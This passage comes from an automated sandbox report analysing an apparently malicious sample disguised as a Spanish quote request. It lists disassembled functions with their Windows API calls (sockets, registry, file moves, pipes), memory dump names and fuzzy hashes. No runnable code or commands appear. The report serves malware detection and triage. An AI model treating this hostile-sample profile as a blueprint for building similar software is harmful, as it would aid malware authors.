WSAGetLastError.WSOCK32 ref: 002811C9
closesocket.WSOCK32(00000000), ref: 002811F9

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 95e140219bc9c77dc83af5aa70d17c130118dc3730f0a596d1b08b56d81df2f3
Instruction ID: 509c32dfa16d8a5d953ec580a001cb70d4c9f64307607324c60c5712eed601aa
Opcode Fuzzy Hash: 95e140219bc9c77dc83af5aa70d17c130118dc3730f0a596d1b08b56d81df2f3
Instruction Fuzzy Hash: 95411475610205AFDB10AF54D888BA9BBEDFF44364F248059FD099B2D2C770AD62CFA1

Function 0026CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0026CF22,?), ref: 0026DDFD

Part of subcall function 0026DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0026CF22,?), ref: 0026DE16

lstrcmpiW.KERNEL32(?,?), ref: 0026CF45
MoveFileW.KERNEL32(?,?), ref: 0026CF7F
_wcslen.LIBCMT ref: 0026D005
_wcslen.LIBCMT ref: 0026D01B
SHFileOperationW.SHELL32(?), ref: 0026D061

Strings

\*.*, xrefs: 0026CFF3

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 7dffea95af215f97728d8eedade91e163de979278d422f90ed782f74aba1c9ff
Instruction ID: 03584ffc534bed83918abfb92d45aab2c8ed75f16b34326e48a92c1eb7a4d3e6
Opcode Fuzzy Hash: 7dffea95af215f97728d8eedade91e163de979278d422f90ed782f74aba1c9ff
Instruction Fuzzy Hash: 48415771D5521D9FDF12EFA4D981AED77B8AF08380F1000E6E545EB142EA34A6D4CF50

Function 00292DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00292E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00292E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00292E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00292EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00292EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00292EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00292F0B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 61a31b96192e944f411042143a53bf1fef2218ad92a5d1b931aab5bf4f861c63
Instruction ID: 1b99c32d0bc19f27d6f0ef58f22fcafd25b0b2c268b8cccb3b18a158d15661ea
Opcode Fuzzy Hash: 61a31b96192e944f411042143a53bf1fef2218ad92a5d1b931aab5bf4f861c63
Instruction Fuzzy Hash: E9312335A15151EFDF21CF18ECD8FA537A4EB8A710F140065F9409B2B2CB60BC649B10

Function 00267726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00267769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0026778F
SysAllocString.OLEAUT32(00000000), ref: 00267792
SysAllocString.OLEAUT32(?), ref: 002677B0
SysFreeString.OLEAUT32(?), ref: 002677B9
StringFromGUID2.OLE32(?,?,00000028), ref: 002677DE
SysAllocString.OLEAUT32(?), ref: 002677EC

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 88b3e63c70e67a924b4fbe9f1992c2c53e1ec5aaa0c969118970eda583341880
Instruction ID: 9d5c3bbcfc84a9dfa5145f709c32d9697506e9f7efc82d9a62cfb0a0c61fae8a
Opcode Fuzzy Hash: 88b3e63c70e67a924b4fbe9f1992c2c53e1ec5aaa0c969118970eda583341880
Instruction Fuzzy Hash: CB21D676618219AFDF11EFA8ED88CBBB7ECEB093687148026F914DB150D674DC818B64

Function 002677FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00267842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00267868
SysAllocString.OLEAUT32(00000000), ref: 0026786B
SysAllocString.OLEAUT32 ref: 0026788C
SysFreeString.OLEAUT32 ref: 00267895
StringFromGUID2.OLE32(?,?,00000028), ref: 002678AF
SysAllocString.OLEAUT32(?), ref: 002678BD

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: df68f6e41eb4da78ad20620942593ad454a0a7e4cc179c697f94236aee323d6a
Instruction ID: 028f68fbf32979ad94a2c7d2bb51b53dd7ceac1de655216134c387d5725101dc
Opcode Fuzzy Hash: df68f6e41eb4da78ad20620942593ad454a0a7e4cc179c697f94236aee323d6a
Instruction Fuzzy Hash: 36218331618205AFDF10AFB8EC8CDBA77ECEB097647208125F915CB2A1D670DC91DB64

Function 002704D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 002704F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0027052E

Strings

nul, xrefs: 00270567

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: cebd83e7f8d1f2ef9a74994b696572de563c3bfb8cc83161f1e2dc703e72b671
Instruction ID: ffcc8db309baecbae283d07fff7631dadbf4c75f3aff8a9af816cbbb4917ff30
Opcode Fuzzy Hash: cebd83e7f8d1f2ef9a74994b696572de563c3bfb8cc83161f1e2dc703e72b671
Instruction Fuzzy Hash: 59217475920306DFDB209F29DC88A5A77B4BF44724F608A19F8A5D72E0D7709968CF20

Function 002705A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 002705C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00270601

Strings

nul, xrefs: 00270639

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: e26f6e4cc217c19acb54042327fb92d6429898cfa63d6bd4bafdeeae8bd594b0
Instruction ID: afcd86e6047930d5fc77053945af4f45985f41e23860b2a836ea108dd6bb9caa
Opcode Fuzzy Hash: e26f6e4cc217c19acb54042327fb92d6429898cfa63d6bd4bafdeeae8bd594b0
Instruction Fuzzy Hash: 9121B575510306DBDB209F69DC94A5A77E8BF85720F208B1AFCA5E72D0D7B09874CB20

Function 002940AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0020600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0020604C
Part of subcall function 0020600E: GetStockObject.GDI32(00000011), ref: 00206060
Part of subcall function 0020600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0020606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00294112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0029411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0029412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00294139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00294145

Strings

Msctls_Progress32, xrefs: 002940E3

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 8486173a11265a30346fbf1cc3034a585bed54784ff04f20866dff5e97335287
Instruction ID: bfc928d075c3bdd5951d175d84737ff923e79abbe9ecebe51ef131c7c5a5c52c
Opcode Fuzzy Hash: 8486173a11265a30346fbf1cc3034a585bed54784ff04f20866dff5e97335287
Instruction Fuzzy Hash: 5C11B2B215021ABEFF119F64CC85EE77F5DEF09798F004111BA18A2090C6729C31DBA4

Function 0023D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0023D7A3: _free.LIBCMT ref: 0023D7CC

_free.LIBCMT ref: 0023D82D

Part of subcall function 002329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000), ref: 002329DE
Part of subcall function 002329C8: GetLastError.KERNEL32(00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000,00000000), ref: 002329F0

_free.LIBCMT ref: 0023D838
_free.LIBCMT ref: 0023D843
_free.LIBCMT ref: 0023D897
_free.LIBCMT ref: 0023D8A2
_free.LIBCMT ref: 0023D8AD
_free.LIBCMT ref: 0023D8B8

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction ID: 55137dc936421f38ba08708b797a44cb7214c60cae8e99b732186d554bc01a85
Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction Fuzzy Hash: 611151B1960B14EAD521BFB0EC47FCBBBDC6F00700F400825B699A6192DA65B5254E50

Function 0026DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0026DA74
LoadStringW.USER32(00000000), ref: 0026DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0026DA91
LoadStringW.USER32(00000000), ref: 0026DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0026DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0026DAB9

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 732f966f55684d88f56d0ecc4f6a7f8cf3e1594262337eb5efc9482995ad5942
Instruction ID: 4cb0417765d89ee55769c09894293d6240c7969499d1beaded8a19a7941a3f5d
Opcode Fuzzy Hash: 732f966f55684d88f56d0ecc4f6a7f8cf3e1594262337eb5efc9482995ad5942
Instruction Fuzzy Hash: 870162F29142087FEB10DBE4AD8DEE7766CEB08301F500497B746E2041EA749E844F74

Function 0027096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0156E528,0156E528), ref: 0027097B
EnterCriticalSection.KERNEL32(0156E508,00000000), ref: 0027098D
TerminateThread.KERNEL32(0156A0D0,000001F6), ref: 0027099B
WaitForSingleObject.KERNEL32(0156A0D0,000003E8), ref: 002709A9
CloseHandle.KERNEL32(0156A0D0), ref: 002709B8
InterlockedExchange.KERNEL32(0156E528,000001F6), ref: 002709C8
LeaveCriticalSection.KERNEL32(0156E508), ref: 002709CF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: ffb467ffe08306f70b6412416a5740ce87c69a4d04112d67b05cf05324eaaceb
Instruction ID: ff90028451c412b349333f639339ca3ab684b8ce721a740e7cb6d150345570eb
Opcode Fuzzy Hash: ffb467ffe08306f70b6412416a5740ce87c69a4d04112d67b05cf05324eaaceb
Instruction Fuzzy Hash: 43F0CD31442912EBD7515FA4EE8DAD67A25BF05702F901026F601508A1C775A475CFA4

Function 00281C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00281DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00281DE1
WSAGetLastError.WSOCK32 ref: 00281DF2
htons.WSOCK32(?,?,?,?,?), ref: 00281EDB
inet_ntoa.WSOCK32(?), ref: 00281E8C

Part of subcall function 002639E8: _strlen.LIBCMT ref: 002639F2

Part of subcall function 00283224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0027EC0C), ref: 00283240

_strlen.LIBCMT ref: 00281F35

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: cd9abb189f0094517f25160b1b135266cbad7161708a885644a65e2d54299d88
Instruction ID: ceefc5d3f14aa9d2630367f87e082296c5b03f4dfd6a689bddab4d9a4e69e773
Opcode Fuzzy Hash: cd9abb189f0094517f25160b1b135266cbad7161708a885644a65e2d54299d88
Instruction Fuzzy Hash: 7FB1D134214301AFC324EF24C885E2A7BE9AF94318F54894CF5565B2E3DB71EDA2CB91

Function 002301B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 002300BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002300D6
__allrem.LIBCMT ref: 002300ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0023010B
__allrem.LIBCMT ref: 00230122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00230140

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 2ec66ab2f6e24f4617ca530a946c3ac76555d257ac6ad620aca9e94e24465cab
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 42815AB2A20716ABE7249F78CD91B6B73F8AF41720F24413AF550D76C1E770D9208B60

Function 002361FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002282D9,002282D9,?,?,?,0023644F,00000001,00000001,8BE85006), ref: 00236258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0023644F,00000001,00000001,8BE85006,?,?,?), ref: 002362DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002363D8
__freea.LIBCMT ref: 002363E5

Part of subcall function 00233820: RtlAllocateHeap.NTDLL(00000000,?,002D1444,?,0021FDF5,?,?,0020A976,00000010,002D1440,002013FC,?,002013C6,?,00201129), ref: 00233852

__freea.LIBCMT ref: 002363EE
__freea.LIBCMT ref: 00236413

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: fca6f3fe5332b4bf7b7633487996f90805860d20a302c46f2b4c5a42eaa038dc
Instruction ID: 6377692ffc90f60b07327207322f2e3d3dc1db9d8e71c6cbb0b8bc7fb5bd7e0e
Opcode Fuzzy Hash: fca6f3fe5332b4bf7b7633487996f90805860d20a302c46f2b4c5a42eaa038dc
Instruction Fuzzy Hash: A551E3B2A20217BBDB258FA4DC89EBF77ADEB44B10F158669FD05D6140DB34DC60CA60

Function 0028BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

Part of subcall function 0028C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028B6AE,?,?), ref: 0028C9B5
Part of subcall function 0028C998: _wcslen.LIBCMT ref: 0028C9F1
Part of subcall function 0028C998: _wcslen.LIBCMT ref: 0028CA68
Part of subcall function 0028C998: _wcslen.LIBCMT ref: 0028CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028BD25
RegCloseKey.ADVAPI32(00000000), ref: 0028BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0028BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0028BDF3
RegCloseKey.ADVAPI32(?), ref: 0028BDFF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 668b8c2c190c73df0910e7acb5af0af66b4216df5421aac73a3e4db740c9ec96
Instruction ID: 4e72a214fbef1c028f2079a3c4cfce09aeed313a97c09375879aa4d11edddacb
Opcode Fuzzy Hash: 668b8c2c190c73df0910e7acb5af0af66b4216df5421aac73a3e4db740c9ec96
Instruction Fuzzy Hash: E0819B34228241AFD715EF24C885E2ABBE5FF84308F14855DF4594B2A2CB31ED55CB92

Function 0025F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0025F7B9
SysAllocString.OLEAUT32(00000001), ref: 0025F860
VariantCopy.OLEAUT32(0025FA64,00000000), ref: 0025F889
VariantClear.OLEAUT32(0025FA64), ref: 0025F8AD
VariantCopy.OLEAUT32(0025FA64,00000000), ref: 0025F8B1
VariantClear.OLEAUT32(?), ref: 0025F8BB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
